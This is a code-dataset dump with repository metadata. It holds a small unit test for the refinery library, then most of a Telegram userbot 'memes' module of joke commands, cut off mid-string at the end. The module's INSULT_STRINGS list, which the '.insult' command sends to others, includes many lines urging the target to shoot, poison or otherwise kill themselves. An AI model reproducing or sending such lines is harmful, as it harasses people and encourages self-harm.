[
"BSD-3-Clause"
] | null | null | null |
test/units/meta/test_xfcc.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .. import TestUnitBase
from refinery.lib.loader import load_pipeline as L
class TestCrossFrameChunkCount(TestUnitBase):
def test_01(self):
pipeline = L('emit ABDF AEC ABE [| rex . [| xfcc ]]')
results = {bytes(chunk): chunk['count'] for chunk in pipeline}
self.assertEqual(results, {
B'A': 3,
B'B': 2,
B'C': 1,
B'D': 1,
B'E': 2,
B'F': 1,
})
| 25
| 71
| 0.497143
|
35d7fd41b62878ea1dc56fef2be88eea1a443cb8
| 38,814
|
py
|
Python
|
userbot/modules/memes.py
|
zankforza/OpenUserBot-2
|
5774471b933c8a6c6f3df12ebf98bf7a7fd8ce3d
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/memes.py
|
zankforza/OpenUserBot-2
|
5774471b933c8a6c6f3df12ebf98bf7a7fd8ce3d
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/memes.py
|
zankforza/OpenUserBot-2
|
5774471b933c8a6c6f3df12ebf98bf7a7fd8ce3d
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | 5
|
2019-12-28T15:59:15.000Z
|
2020-01-24T18:34:52.000Z
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for having some fun with people. """
from asyncio import sleep
from random import choice, getrandbits, randint
from re import sub
import time
from collections import deque
import requests
from cowpy import cow
from userbot import CMD_HELP
from userbot.events import register
from userbot.modules.admin import get_user_from_event
# ================= CONSTANT =================
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
ZALG_LIST = [[
"̖",
" ̗",
" ̘",
" ̙",
" ̜",
" ̝",
" ̞",
" ̟",
" ̠",
" ̤",
" ̥",
" ̦",
" ̩",
" ̪",
" ̫",
" ̬",
" ̭",
" ̮",
" ̯",
" ̰",
" ̱",
" ̲",
" ̳",
" ̹",
" ̺",
" ̻",
" ̼",
" ͅ",
" ͇",
" ͈",
" ͉",
" ͍",
" ͎",
" ͓",
" ͔",
" ͕",
" ͖",
" ͙",
" ͚",
" ",
],
[
" ̍",
" ̎",
" ̄",
" ̅",
" ̿",
" ̑",
" ̆",
" ̐",
" ͒",
" ͗",
" ͑",
" ̇",
" ̈",
" ̊",
" ͂",
" ̓",
" ̈́",
" ͊",
" ͋",
" ͌",
" ̃",
" ̂",
" ̌",
" ͐",
" ́",
" ̋",
" ̏",
" ̽",
" ̉",
" ͣ",
" ͤ",
" ͥ",
" ͦ",
" ͧ",
" ͨ",
" ͩ",
" ͪ",
" ͫ",
" ͬ",
" ͭ",
" ͮ",
" ͯ",
" ̾",
" ͛",
" ͆",
" ̚",
],
[
" ̕",
" ̛",
" ̀",
" ́",
" ͘",
" ̡",
" ̢",
" ̧",
" ̨",
" ̴",
" ̵",
" ̶",
" ͜",
" ͝",
" ͞",
" ͟",
" ͠",
" ͢",
" ̸",
" ̷",
" ͡",
]]
EMOJIS = [
"😂",
"😂",
"👌",
"✌",
"💞",
"👍",
"👌",
"💯",
"🎶",
"👀",
"😂",
"👓",
"👏",
"👐",
"🍕",
"💥",
"🍴",
"💦",
"💦",
"🍑",
"🍆",
"😩",
"😏",
"👉👌",
"👀",
"👅",
"😩",
"🚰",
]
INSULT_STRINGS = [
"Owww ... Such a stupid idiot.",
"Don't drink and type.",
"I think you should go home or better a mental asylum.",
"Command not found. Just like your brain.",
"Do you realize you are making a fool of yourself? Apparently not.",
"You can type better than that.",
"Bot rule 544 section 9 prevents me from replying to stupid humans like you.",
"Sorry, we do not sell brains.",
"Believe me you are not normal.",
"I bet your brain feels as good as new, seeing that you never use it.",
"If I wanted to kill myself I'd climb your ego and jump to your IQ.",
"Zombies eat brains... you're safe.",
"You didn't evolve from apes, they evolved from you.",
"Come back and talk to me when your I.Q. exceeds your age.",
"I'm not saying you're stupid, I'm just saying you've got bad luck when it comes to thinking.",
"What language are you speaking? Cause it sounds like bullshit.",
"Stupidity is not a crime so you are free to go.",
"You are proof that evolution CAN go in reverse.",
"I would ask you how old you are but I know you can't count that high.",
"As an outsider, what do you think of the human race?",
"Brains aren't everything. In your case they're nothing.",
"Ordinarily people live and learn. You just live.",
"I don't know what makes you so stupid, but it really works.",
"Keep talking, someday you'll say something intelligent! (I doubt it though)",
"Shock me, say something intelligent.",
"Your IQ's lower than your shoe size.",
"Alas! Your neurotransmitters are no more working.",
"Are you crazy you fool.",
"Everyone has the right to be stupid but you are abusing the privilege.",
"I'm sorry I hurt your feelings when I called you stupid. I thought you already knew that.",
"You should try tasting cyanide.",
"Your enzymes are meant to digest rat poison.",
"You should try sleeping forever.",
"Pick up a gun and shoot yourself.",
"You could make a world record by jumping from a plane without parachute.",
"Stop talking BS and jump in front of a running bullet train.",
"Try bathing with Hydrochloric Acid instead of water.",
"Try this: if you hold your breath underwater for an hour, you can then hold it forever.",
"Go Green! Stop inhaling Oxygen.",
"God was searching for you. You should leave to meet him.",
"give your 100%. Now, go donate blood.",
"Try jumping from a hundred story building but you can do it only once.",
"You should donate your brain seeing that you never used it.",
"Volunteer for target in an firing range.",
"Head shots are fun. Get yourself one.",
"You should try swimming with great white sharks.",
"You should paint yourself red and run in a bull marathon.",
"You can stay underwater for the rest of your life without coming back up.",
"How about you stop breathing for like 1 day? That'll be great.",
"Try provoking a tiger while you both are in a cage.",
"Have you tried shooting yourself as high as 100m using a canon.",
"You should try holding TNT in your mouth and igniting it.",
"Try playing catch and throw with RDX its fun.",
"I heard phogine is poisonous but i guess you wont mind inhaling it for fun.",
"Launch yourself into outer space while forgetting oxygen on Earth.",
"You should try playing snake and ladders, with real snakes and no ladders.",
"Dance naked on a couple of HT wires.",
"Active Volcano is the best swimming pool for you.",
"You should try hot bath in a volcano.",
"Try to spend one day in a coffin and it will be yours forever.",
"Hit Uranium with a slow moving neutron in your presence. It will be a worthwhile experience.",
"You can be the first person to step on sun. Have a try.",
]
UWUS = [
"(・`ω´・)",
";;w;;",
"owo",
"UwU",
">w<",
"^w^",
r"\(^o\) (/o^)/",
"( ^ _ ^)∠☆",
"(ô_ô)",
"~:o",
";-;",
"(*^*)",
"(>_",
"(♥_♥)",
"*(^O^)*",
"((+_+))",
]
FACEREACTS = [
"ʘ‿ʘ",
"ヾ(-_- )ゞ",
"(っ˘ڡ˘ς)",
"(´ж`ς)",
"( ಠ ʖ̯ ಠ)",
"(° ͜ʖ͡°)╭∩╮",
"(ᵟຶ︵ ᵟຶ)",
"(งツ)ว",
"ʚ(•`",
"(っ▀¯▀)つ",
"(◠﹏◠)",
"( ͡ಠ ʖ̯ ͡ಠ)",
"( ఠ ͟ʖ ఠ)",
"(∩`-´)⊃━☆゚.*・。゚",
"(⊃。•́‿•̀。)⊃",
"(._.)",
"{•̃_•̃}",
"(ᵔᴥᵔ)",
"♨_♨",
"⥀.⥀",
"ح˚௰˚づ ",
"(҂◡_◡)",
"ƪ(ړײ)ƪ",
"(っ•́。•́)♪♬",
"◖ᵔᴥᵔ◗ ♪ ♫ ",
"(☞゚ヮ゚)☞",
"[¬º-°]¬",
"(Ծ‸ Ծ)",
"(•̀ᴗ•́)و ̑̑",
"ヾ(´〇`)ノ♪♪♪",
"(ง'̀-'́)ง",
"ლ(•́•́ლ)",
"ʕ •́؈•̀ ₎",
"♪♪ ヽ(ˇ∀ˇ )ゞ",
"щ(゚Д゚щ)",
"( ˇ෴ˇ )",
"눈_눈",
"(๑•́ ₃ •̀๑) ",
"( ˘ ³˘)♥ ",
"ԅ(≖‿≖ԅ)",
"♥‿♥",
"◔_◔",
"⁽⁽ଘ( ˊᵕˋ )ଓ⁾⁾",
"乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍",
"( ఠൠఠ )ノ",
"٩(๏_๏)۶",
"┌(ㆆ㉨ㆆ)ʃ",
"ఠ_ఠ",
"(づ。◕‿‿◕。)づ",
"(ノಠ ∩ಠ)ノ彡( \\o°o)\\",
"“ヽ(´▽`)ノ”",
"༼ ༎ຶ ෴ ༎ຶ༽",
"。゚( ゚இ‸இ゚)゚。",
"(づ ̄ ³ ̄)づ",
"(⊙.☉)7",
"ᕕ( ᐛ )ᕗ",
"t(-_-t)",
"(ಥ⌣ಥ)",
"ヽ༼ ಠ益ಠ ༽ノ",
"༼∵༽ ༼⍨༽ ༼⍢༽ ༼⍤༽",
"ミ●﹏☉ミ",
"(⊙_◎)",
"¿ⓧ_ⓧﮌ",
"ಠ_ಠ",
"(´・_・`)",
"ᕦ(ò_óˇ)ᕤ",
"⊙﹏⊙",
"(╯°□°)╯︵ ┻━┻",
r"¯\_(⊙︿⊙)_/¯",
"٩◔̯◔۶",
"°‿‿°",
"ᕙ(⇀‸↼‶)ᕗ",
"⊂(◉‿◉)つ",
"V•ᴥ•V",
"q(❂‿❂)p",
"ಥ_ಥ",
"ฅ^•ﻌ•^ฅ",
"ಥ﹏ಥ",
"( ^_^)o自自o(^_^ )",
"ಠ‿ಠ",
"ヽ(´▽`)/",
"ᵒᴥᵒ#",
"( ͡° ͜ʖ ͡°)",
"┬─┬ ノ( ゜-゜ノ)",
"ヽ(´ー`)ノ",
"☜(⌒▽⌒)☞",
"ε=ε=ε=┌(;*´Д`)ノ",
"(╬ ಠ益ಠ)",
"┬─┬⃰͡ (ᵔᵕᵔ͜ )",
"┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻",
r"¯\_(ツ)_/¯",
"ʕᵔᴥᵔʔ",
"(`・ω・´)",
"ʕ•ᴥ•ʔ",
"ლ(`ー´ლ)",
"ʕʘ̅͜ʘ̅ʔ",
"( ゚Д゚)",
r"¯\(°_o)/¯",
"(。◕‿◕。)",
]
RUNS_STR = [
"Runs to Thanos..",
"Runs far, far away from earth..",
"Running faster than Bolt coz i'mma userbot !!",
"Runs to Marie..",
"This Group is too cancerous to deal with.",
"Cya bois",
"Kys",
"I go away",
"I am just walking off, coz me is too fat.",
"I Fugged off!",
"Will run for chocolate.",
"I run because I really like food.",
"Running...\nbecause dieting is not an option.",
"Wicked fast runnah",
"If you wanna catch me, you got to be fast...\nIf you wanna stay with me, you got to be good...\nBut if you wanna pass me...\nYou've got to be kidding.",
"Anyone can run a hundred meters, it's the next forty-two thousand and two hundred that count.",
"Why are all these people following me?",
"Are the kids still chasing me?",
"Running a marathon...there's an app for that.",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"Get back here!",
"Not so fast...",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"Jokes on you, I'm everywhere",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"Go bother someone else, no-one here cares.",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
"\"Oh, look at me! I'm so cool, I can run from a bot!\" - this person",
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"Legend has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"Legend has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
HELLOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"‘Sup, homeslice?",
"Howdy, howdy ,howdy!",
"Hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"Hello, sunshine!",
"Hey, howdy, hi!",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"Hey there, freshman!",
"I come in peace!",
"Ahoy, matey!",
"Hiya!",
]
SHGS = [
"┐(´д`)┌",
"┐(´~`)┌",
"┐(´ー`)┌",
"┐( ̄ヘ ̄)┌",
"╮(╯∀╰)╭",
"╮(╯_╰)╭",
"┐(´д`)┌",
"┐(´∀`)┌",
"ʅ(́◡◝)ʃ",
"┐(゚~゚)┌",
"┐('д')┌",
"┐(‘~`;)┌",
"ヘ(´-`;)ヘ",
"┐( -“-)┌",
"ʅ(´◔౪◔)ʃ",
"ヽ(゜~゜o)ノ",
"ヽ(~~~ )ノ",
"┐(~ー~;)┌",
"┐(-。ー;)┌",
r"¯\_(ツ)_/¯",
r"¯\_(⊙_ʖ⊙)_/¯",
r"¯\_༼ ಥ ‿ ಥ ༽_/¯",
"乁( ⁰͡ Ĺ̯ ⁰͡ ) ㄏ",
]
CRI = [
"أ‿أ",
"╥﹏╥",
"(;﹏;)",
"(ToT)",
"(┳Д┳)",
"(ಥ﹏ಥ)",
"(;へ:)",
"(T_T)",
"(πーπ)",
"(T▽T)",
"(⋟﹏⋞)",
"(iДi)",
"(´Д⊂ヽ",
"(;Д;)",
"(>﹏<)",
"(TдT)",
"(つ﹏⊂)",
"༼☯﹏☯༽",
"(ノ﹏ヽ)",
"(ノAヽ)",
"(╥_╥)",
"(T⌓T)",
"(༎ຶ⌑༎ຶ)",
"(☍﹏⁰)。",
"(ಥ_ʖಥ)",
"(つд⊂)",
"(≖͞_≖̥)",
"(இ﹏இ`。)",
"༼ಢ_ಢ༽",
"༼ ༎ຶ ෴ ༎ຶ༽",
]
SLAP_TEMPLATES = [
"{hits} {victim} with a {item}.",
"{hits} {victim} in the face with a {item}.",
"{hits} {victim} around a bit with a {item}.",
"{throws} a {item} at {victim}.",
"grabs a {item} and {throws} it at {victim}'s face.",
"{hits} a {item} at {victim}.", "{throws} a few {item} at {victim}.",
"grabs a {item} and {throws} it in {victim}'s face.",
"launches a {item} in {victim}'s general direction.",
"sits on {victim}'s face while slamming a {item} {where}.",
"starts slapping {victim} silly with a {item}.",
"pins {victim} down and repeatedly {hits} them with a {item}.",
"grabs up a {item} and {hits} {victim} with it.",
"starts slapping {victim} silly with a {item}.",
"holds {victim} down and repeatedly {hits} them with a {item}.",
"prods {victim} with a {item}.",
"picks up a {item} and {hits} {victim} with it.",
"ties {victim} to a chair and {throws} a {item} at them.",
"{hits} {victim} {where} with a {item}.",
"ties {victim} to a pole and whips them {where} with a {item}."
"gave a friendly push to help {victim} learn to swim in lava.",
"sent {victim} to /dev/null.", "sent {victim} down the memory hole.",
"beheaded {victim}.", "threw {victim} off a building.",
"replaced all of {victim}'s music with Nickelback.",
"spammed {victim}'s email.", "made {victim} a knuckle sandwich.",
"slapped {victim} with pure nothing.",
"hit {victim} with a small, interstellar spaceship.",
"quickscoped {victim}.", "put {victim} in check-mate.",
"RSA-encrypted {victim} and deleted the private key.",
"put {victim} in the friendzone.",
"slaps {victim} with a DMCA takedown request!"
]
ITEMS = [
"cast iron skillet",
"large trout",
"baseball bat",
"cricket bat",
"wooden cane",
"nail",
"printer",
"shovel",
"pair of trousers",
"CRT monitor",
"diamond sword",
"baguette",
"physics textbook",
"toaster",
"portrait of Richard Stallman",
"television",
"mau5head",
"five ton truck",
"roll of duct tape",
"book",
"laptop",
"old television",
"sack of rocks",
"rainbow trout",
"cobblestone block",
"lava bucket",
"rubber chicken",
"spiked bat",
"gold block",
"fire extinguisher",
"heavy rock",
"chunk of dirt",
"beehive",
"piece of rotten meat",
"bear",
"ton of bricks",
]
THROW = [
"throws",
"flings",
"chucks",
"hurls",
]
HIT = [
"hits",
"whacks",
"slaps",
"smacks",
"bashes",
]
WHERE = ["in the chest", "on the head", "on the butt", "on the crotch"]
# ===========================================
@register(outgoing=True, pattern=r"^.(\w+)say (.*)")
async def univsaye(cowmsg):
""" For .cowsay module, userbot wrapper for cow which says things. """
arg = cowmsg.pattern_match.group(1).lower()
text = cowmsg.pattern_match.group(2)
if arg == "cow":
arg = "default"
if arg not in cow.COWACTERS:
return
cheese = cow.get_cow(arg)
cheese = cheese()
await cowmsg.edit(f"`{cheese.milk(text).replace('`', '´')}`")
@register(outgoing=True, pattern="^:/$", ignore_unsafe=True)
async def kek(keks):
""" Check yourself ;)"""
uio = ["/", "\\"]
for i in range(1, 15):
        await sleep(0.3)  # non-blocking sleep so the event loop keeps running
await keks.edit(":" + uio[i % 2])
@register(outgoing=True, pattern=r"^.coinflip (.*)")
async def coin(event):
r = choice(["heads", "tails"])
input_str = event.pattern_match.group(1)
if input_str:
input_str = input_str.lower()
if r == "heads":
if input_str == "heads":
await event.edit(
"The coin landed on: **Heads**.\nYou were correct.")
elif input_str == "tails":
await event.edit(
"The coin landed on: **Heads**.\nYou weren't correct, try again ..."
)
else:
await event.edit("The coin landed on: **Heads**.")
elif r == "tails":
if input_str == "tails":
await event.edit(
"The coin landed on: **Tails**.\nYou were correct.")
elif input_str == "heads":
await event.edit(
"The coin landed on: **Tails**.\nYou weren't correct, try again ..."
)
else:
await event.edit("The coin landed on: **Tails**.")
@register(pattern="^.slap(?: |$)(.*)", outgoing=True)
async def who(event):
""" slaps a user, or get slapped if not a reply. """
replied_user = await get_user_from_event(event)
if replied_user:
replied_user = replied_user[0]
else:
return
caption = await slap(replied_user, event)
try:
await event.edit(caption)
except BaseException:
await event.edit(
"`Can't slap this person, need to fetch some sticks and stones !!`"
)
async def slap(replied_user, event):
""" Construct a funny slap sentence !! """
user_id = replied_user.id
first_name = replied_user.first_name
username = replied_user.username
if username:
slapped = "@{}".format(username)
else:
slapped = f"[{first_name}](tg://user?id={user_id})"
temp = choice(SLAP_TEMPLATES)
item = choice(ITEMS)
hit = choice(HIT)
throw = choice(THROW)
where = choice(WHERE)
caption = "..." + temp.format(
victim=slapped, item=item, hits=hit, throws=throw, where=where)
return caption
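# Illustrative example of the formatting above (the user name is hypothetical):
# with temp = "{throws} a {item} at {victim}.", throw = "chucks" and
# item = "rubber chicken", the caption becomes
# "...chucks a rubber chicken at @example_user."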
@register(outgoing=True, pattern="^-_-$", ignore_unsafe=True)
async def lol(lel):
""" Ok... """
okay = "-_-"
for i in range(10):
okay = okay[:-1] + "_-"
await lel.edit(okay)
@register(outgoing=True, pattern="^.(yes|no|maybe|decide)$")
async def decide(event):
decision = event.pattern_match.group(1).lower()
message_id = event.reply_to_msg_id if event.reply_to_msg_id else None
if decision != "decide":
r = requests.get(f"https://yesno.wtf/api?force={decision}").json()
else:
        r = requests.get("https://yesno.wtf/api").json()
await event.delete()
await event.client.send_message(event.chat_id,
str(r["answer"]).upper(),
reply_to=message_id,
file=r["image"])
@register(outgoing=True, pattern="^;_;$", ignore_unsafe=True)
async def fun(e):
t = ";_;"
for j in range(10):
t = t[:-1] + "_;"
await e.edit(t)
@register(outgoing=True, pattern="^.fp$")
async def facepalm(e):
""" Facepalm 🤦♂ """
await e.edit("🤦♂")
@register(outgoing=True, pattern="^.cry$")
async def cry(e):
""" y u du dis, i cry everytime !! """
await e.edit(choice(CRI))
@register(outgoing=True, pattern="^.insult$")
async def insult(e):
""" I make you cry !! """
await e.edit(choice(INSULT_STRINGS))
@register(outgoing=True, pattern="^.cp(?: |$)(.*)")
async def copypasta(cp_e):
""" Copypasta the famous meme """
textx = await cp_e.get_reply_message()
message = cp_e.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await cp_e.edit("`😂🅱️IvE👐sOME👅text👅for✌️Me👌tO👐MAkE👀iT💞funNy!💦`")
return
reply_text = choice(EMOJIS)
# choose a random character in the message to be substituted with 🅱️
b_char = choice(message).lower()
for owo in message:
if owo == " ":
reply_text += choice(EMOJIS)
elif owo in EMOJIS:
reply_text += owo
reply_text += choice(EMOJIS)
elif owo.lower() == b_char:
reply_text += "🅱️"
else:
if bool(getrandbits(1)):
reply_text += owo.upper()
else:
reply_text += owo.lower()
reply_text += choice(EMOJIS)
await cp_e.edit(reply_text)
@register(outgoing=True, pattern="^.vapor(?: |$)(.*)")
async def vapor(vpr):
""" Vaporize everything! """
reply_text = list()
textx = await vpr.get_reply_message()
message = vpr.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await vpr.edit("`Give some text for vapor!`")
return
for charac in message:
if 0x21 <= ord(charac) <= 0x7F:
reply_text.append(chr(ord(charac) + 0xFEE0))
elif ord(charac) == 0x20:
reply_text.append(chr(0x3000))
else:
reply_text.append(charac)
await vpr.edit("".join(reply_text))
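# Note on .vapor above (illustrative): printable ASCII (0x21-0x7F) is mapped onto
# the fullwidth forms block by adding 0xFEE0, and a plain space (0x20) becomes the
# ideographic space U+3000. For example 'A' (0x41) becomes 'A' (0xFF21), so
# "vapor" renders as "vapor".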
@register(outgoing=True, pattern="^.str(?: |$)(.*)")
async def stretch(stret):
""" Stretch it."""
textx = await stret.get_reply_message()
    message = stret.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await stret.edit("`GiiiiiiiB sooooooomeeeeeee teeeeeeext!`")
return
count = randint(3, 10)
reply_text = sub(r"([aeiouAEIOUaeiouAEIOUаеиоуюяыэё])", (r"\1" * count),
message)
await stret.edit(reply_text)
@register(outgoing=True, pattern="^.zal(?: |$)(.*)")
async def zal(zgfy):
""" Invoke the feeling of chaos. """
reply_text = list()
textx = await zgfy.get_reply_message()
message = zgfy.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await zgfy.edit(
"`gͫ ̆ i̛ ̺ v͇̆ ȅͅ a̢ͦ s̴̪ c̸̢ ä̸ rͩͣ y͖͞ t̨͚ é̠ x̢͖ t͔͛`"
)
return
for charac in message:
if not charac.isalpha():
reply_text.append(charac)
continue
        for _ in range(0, 3):
            which = randint(0, 2)  # avoid shadowing random.randint, which broke later iterations
            if which == 0:
                charac = charac.strip() + \
                    choice(ZALG_LIST[0]).strip()
            elif which == 1:
                charac = charac.strip() + \
                    choice(ZALG_LIST[1]).strip()
            else:
                charac = charac.strip() + \
                    choice(ZALG_LIST[2]).strip()
reply_text.append(charac)
await zgfy.edit("".join(reply_text))
@register(outgoing=True, pattern="^.hi$")
async def hoi(hello):
""" Greet everyone! """
await hello.edit(choice(HELLOSTR))
@register(outgoing=True, pattern="^.owo(?: |$)(.*)")
async def faces(owo):
""" UwU """
textx = await owo.get_reply_message()
message = owo.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await owo.edit("` UwU no text given! `")
return
reply_text = sub(r"(r|l)", "w", message)
reply_text = sub(r"(R|L)", "W", reply_text)
reply_text = sub(r"n([aeiou])", r"ny\1", reply_text)
reply_text = sub(r"N([aeiouAEIOU])", r"Ny\1", reply_text)
reply_text = sub(r"\!+", " " + choice(UWUS), reply_text)
reply_text = reply_text.replace("ove", "uv")
reply_text += " " + choice(UWUS)
await owo.edit(reply_text)
@register(outgoing=True, pattern="^.react$")
async def react_meme(react):
""" Make your userbot react to everything. """
await react.edit(choice(FACEREACTS))
@register(outgoing=True, pattern="^.shg$")
async def shrugger(shg):
r""" ¯\_(ツ)_/¯ """
await shg.edit(choice(SHGS))
@register(outgoing=True, pattern="^.chase$")
async def police(chase):
""" Run boi run, i'm gonna catch you !! """
await chase.edit(choice(CHASE_STR))
@register(outgoing=True, pattern="^.run$")
async def runner_lol(run):
""" Run, run, RUNNN! """
await run.edit(choice(RUNS_STR))
@register(outgoing=True, pattern="^.metoo$")
async def metoo(hahayes):
""" Haha yes """
await hahayes.edit(choice(METOOSTR))
@register(outgoing=True, pattern="^Oof$")
async def Oof(e):
t = "Oof"
for j in range(15):
t = t[:-1] + "of"
await e.edit(t)
@register(outgoing=True, pattern="^.10iq$")
async def iqless(e):
await e.edit("♿")
@register(outgoing=True, pattern="^.moon$")
async def moon(event):
deq = deque(list("🌗🌘🌑🌒🌓🌔🌕🌖"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.earth$")
async def earth(event):
deq = deque(list("🌏🌍🌎🌎🌍🌏🌍🌎"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.clock$")
async def clock(event):
deq = deque(list("🕙🕘🕗🕖🕕🕔🕓🕒🕑🕐🕛"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.rain$")
async def rain(event):
deq = deque(list("☀️🌤⛅️🌥☁️🌧⛈"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.love$")
async def love(event):
deq = deque(list("❤️🧡💛💚💙💜🖤💕💞💓💗💖💘💝"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.mock(?: |$)(.*)")
async def spongemocktext(mock):
""" Do it and find the real fun. """
reply_text = list()
textx = await mock.get_reply_message()
message = mock.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await mock.edit("`gIvE sOMEtHInG tO MoCk!`")
return
for charac in message:
if charac.isalpha() and randint(0, 1):
to_app = charac.upper() if charac.islower() else charac.lower()
reply_text.append(to_app)
else:
reply_text.append(charac)
await mock.edit("".join(reply_text))
@register(outgoing=True, pattern="^.clap(?: |$)(.*)")
async def claptext(memereview):
""" Praise people! """
textx = await memereview.get_reply_message()
message = memereview.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await memereview.edit("`Hah, I don't clap pointlessly!`")
return
reply_text = "👏 "
reply_text += message.replace(" ", " 👏 ")
reply_text += " 👏"
await memereview.edit(reply_text)
@register(outgoing=True, pattern="^.bt$")
async def bluetext(bt_e):
""" Believe me, you will find this useful. """
if await bt_e.get_reply_message() and bt_e.is_group:
await bt_e.edit(
"/BLUETEXT /MUST /CLICK.\n"
"/ARE /YOU /A /STUPID /ANIMAL /WHICH /IS /ATTRACTED /TO /COLOURS?")
@register(outgoing=True, pattern=r"^.f (.*)")
async def payf(event):
paytext = event.pattern_match.group(1)
pay = "{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}".format(
paytext * 8, paytext * 8, paytext * 2, paytext * 2, paytext * 2,
paytext * 6, paytext * 6, paytext * 2, paytext * 2, paytext * 2,
paytext * 2, paytext * 2)
await event.edit(pay)
@register(outgoing=True, pattern="^.lfy (.*)")
async def let_me_google_that_for_you(lmgtfy_q):
textx = await lmgtfy_q.get_reply_message()
qry = lmgtfy_q.pattern_match.group(1)
if qry:
query = str(qry)
elif textx:
query = textx
query = query.message
query_encoded = query.replace(" ", "+")
lfy_url = f"http://lmgtfy.com/?s=g&iie=1&q={query_encoded}"
payload = {'format': 'json', 'url': lfy_url}
r = requests.get('http://is.gd/create.php', params=payload)
await lmgtfy_q.edit(f"Here you are, help yourself.\
\n[{query}]({r.json()['shorturl']})")
@register(pattern=r".scam(?: |$)(.*)", outgoing=True)
async def scam(event):
""" Just a small command to fake chat actions for fun !! """
options = [
'typing', 'contact', 'game', 'location', 'voice', 'round', 'video',
'photo', 'document', 'cancel'
]
input_str = event.pattern_match.group(1)
args = input_str.split()
if len(args) == 0: # Let bot decide action and time
scam_action = choice(options)
scam_time = randint(30, 60)
elif len(args) == 1: # User decides time/action, bot decides the other.
        try:
            scam_time = int(args[0])  # if the single argument is a number, treat it as the time
            scam_action = choice(options)
        except ValueError:  # otherwise treat it as the action and pick a random time
            scam_action = str(args[0]).lower()
            scam_time = randint(30, 60)
elif len(args) == 2: # User decides both action and time
scam_action = str(args[0]).lower()
scam_time = int(args[1])
else:
await event.edit("`Invalid Syntax !!`")
return
try:
if (scam_time > 0):
await event.delete()
async with event.client.action(event.chat_id, scam_action):
await sleep(scam_time)
except BaseException:
return
@register(pattern=r".type(?: |$)(.*)", outgoing=True)
async def typewriter(typew):
""" Just a small command to make your keyboard become a typewriter! """
textx = await typew.get_reply_message()
message = typew.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await typew.edit("`Give a text to type!`")
return
sleep_time = 0.03
typing_symbol = "|"
old_text = ""
await typew.edit(typing_symbol)
await sleep(sleep_time)
for character in message:
old_text = old_text + "" + character
typing_text = old_text + "" + typing_symbol
await typew.edit(typing_text)
await sleep(sleep_time)
await typew.edit(old_text)
await sleep(sleep_time)
@register(outgoing=True, pattern="^.leave$")
async def leave(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`You must Leaving dis Group kek!`")
@register(outgoing=True, pattern="^.fail$")
async def fail(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ `"
"`\n████▌▄▌▄▐▐▌█████ `"
"`\n████▌▄▌▄▐▐▌▀████ `"
